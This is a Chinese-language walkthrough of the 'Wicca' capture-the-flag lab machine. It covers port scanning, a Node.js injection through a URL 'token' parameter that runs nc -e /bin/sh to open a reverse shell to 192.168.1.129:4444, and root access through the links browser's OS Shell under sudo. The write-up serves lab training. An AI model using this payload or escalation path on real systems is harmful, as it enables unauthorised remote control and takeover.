# 靶场搭建
下载:Wicca
下载、导入、Nat
IP: 192.168.1.130
# 渗透过程
# 信息初收集
PORT STATE SERVICE VERSION | |
22/tcp open ssh OpenSSH 9.2p1 Debian 2 (protocol 2.0) | |
| ssh-hostkey: | |
| 256 3a:dc:d6:1d:84:b6:96:c0:8f:96:1e:65:a0:24:0e:fb (ECDSA) | |
|_ 256 de:93:17:fb:3a:19:9c:e0:17:32:2d:a9:73:f7:c5:94 (ED25519) | |
80/tcp open http Apache httpd 2.4.57 ((Debian)) | |
|_http-title: Apache2 Debian Default Page: It works | |
|_http-server-header: Apache/2.4.57 (Debian) | |
5000/tcp open http Node.js (Express middleware) | |
|_http-title: VulNyx Lab |
5000 打开看上去像是注入,测试的时候发现有一个 token。
本来以为是必须 token 和 form 表里面的一致才可以,但是改了一下发现没关系?
但是字母的时候直接就报错了,不太熟悉 nodejs,token 上搞一个反弹 shell 看看? http://192.168.1.130:5000/?name=1&token=require(%27child_process%27).exec(%27nc%20-e%20/bin/sh%20192.168.1.129%204444%27)
OK 了,弹出来了
# 提权
sudo -l 看到了 links,查了一下资料发现有 os shell 的功能
那我们 sudo 运行 links
按 ESC,呼出菜单栏,按空格选择 file 选项,按↓选到 OS Shell ,按空格 OK 了,拿到了 root 权限
# 小结
Links 是一款开源的文本浏览器,它可以在终端中浏览网页,支持 HTML、CSS 和 JavaScript 等标准。Links 具有轻量、快速、低资源占用等特点,因此经常被用于在较弱的计算机或低速网络上进行网页浏览。
Links 浏览器支持多个操作系统,包括 Linux、FreeBSD、NetBSD、OpenBSD、Solaris、AIX、HP-UX、Unix、Windows 等。它也支持多种终端类型,包括 xterm、rxvt、Linux 控制台等。
Links 浏览器支持多种浏览模式,包括常规浏览模式、文件浏览模式、图像浏览模式等。它可以通过快捷键进行页面缩放、滚动、导航等操作,支持多语言界面和多种字符编码。
